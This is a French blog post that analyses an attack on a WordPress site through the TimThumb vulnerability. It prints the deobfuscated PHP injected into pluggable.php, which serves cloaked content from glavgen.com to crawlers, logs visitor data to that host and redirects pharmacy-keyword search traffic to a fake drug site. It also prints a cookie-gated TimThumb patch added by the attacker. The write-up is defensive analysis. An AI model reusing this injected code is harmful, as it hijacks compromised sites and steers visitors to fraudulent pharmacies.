WordPress Timthumb Viagra Attack : klikcentral.com / glavgen.com

Une tentative de hack ce matin qui tente d’exploiter  la vulnérabilité ThimThumb.

Le code offusqué qui a tenté d’être inséré dans le fichier wp-includes/pluggable.php de WordPress :

On arrive à ce code PHP :

 

error_reporting(0);
 $bot_list = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82","64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92","64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77","66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65","66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67","66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232","66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52","67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231","68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199","72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129","72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213","72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61","72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11","74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22","74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31","74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73","74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","74.55.27","141.185.209","169.207.238","199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98","202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13","209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62","209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83","209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58","216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45","216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130","174.129.66","85.17.19");
 $ip = preg_replace("/\.(\d+)$/", '', $_SERVER["REMOTE_ADDR"]);
 $agent = $_SERVER["HTTP_USER_AGENT"];
if ($_GET["testd"]=="ok") { print "ok!"; exit; }
if(in_array($ip, $bot_list) || strpos($agent, "bot")) {
 if ($_SERVER["QUERY_STRING"]=="q") { print "ok!"; exit; }
$page=urlencode("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
 $outsourceurl=base64_decode('aHR0cDovL2dsYXZnZW4uY29tL2dldC5waHA/c2l0ZT0=').urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&agent='.urlencode($_SERVER['HTTP_USER_AGENT']);
 if (function_exists("curl_init")) {
 $c = curl_init();
 curl_setopt($c, CURLOPT_URL, $outsourceurl);
 curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
 $out = curl_exec($c);
 curl_close($c);
 } else {
 $out = file_get_contents($outsourceurl);
 }
 if (substr($out,0,3) == "OK!") { echo substr($out,4); die; }
 }
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"])) {
 $tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia');
 $niche='unknown';
 foreach($tabs as $tab) {
 if(preg_match("/$tab/i", $_SERVER["HTTP_REFERER"])) {
 $niche = $tab;
 }
 }
 if ($niche!="unknown") {
 $urlsutra = base64_decode('aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMSZwYXJhbWV0ZXI9');
 if (false == ($str=file_get_contents($urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']))) {
 header("location: ".$urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']);
 exit;
 } else {
 echo $str;
 exit;
 }
 }
 }

A chaque connexion vers le blog hacké, une connexion vers l’URL suivante sera effectuée : http://glavgen.com/get.php?site=&page=&ip=&agent= Ceci permet donc de logguer les connexions effectuées sur le blog. Si l’internaute provient d’un moteur de recherche (enfin du moins le nom d’un moteur de recherche dans le referer) et que ce dernier contient aussi un des mots suivants :

'viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia'
Alors l'internaute sera redirigé vers le site suivant : http://klikcentral.com/traffic/in.cgi?11&parameter=&seoref=&http_refer= qui vous l'avez deviné est un faux site de ventes de produits pharmaceutiques :

Un second « hack » a lieu qui insère le code suivante dans la librairie Timthumb :

if(md5($_COOKIE['access-admin']) != "f732d47960be7e806861987f98a9574c") {
 $mysrc = $_GET['src'];
 if(strpos($mysrc,'.php')) {
 die;
 }
 }

Le but est d’empécher en autre hack en interdisant tout paramètre « src » sur la librairie.

Interressant de constater que cette fois le hack n’a pas pour but d’insérer du code pour aboutir à un exploit sur site WEB et infecter les visiteurs du blog ou redirigers vers de fausses pages WEB d’alertes faisant la promotion de rogues mais vers une fausse page WEB pharmaceutique ce qui est plutôt rare.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 18 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *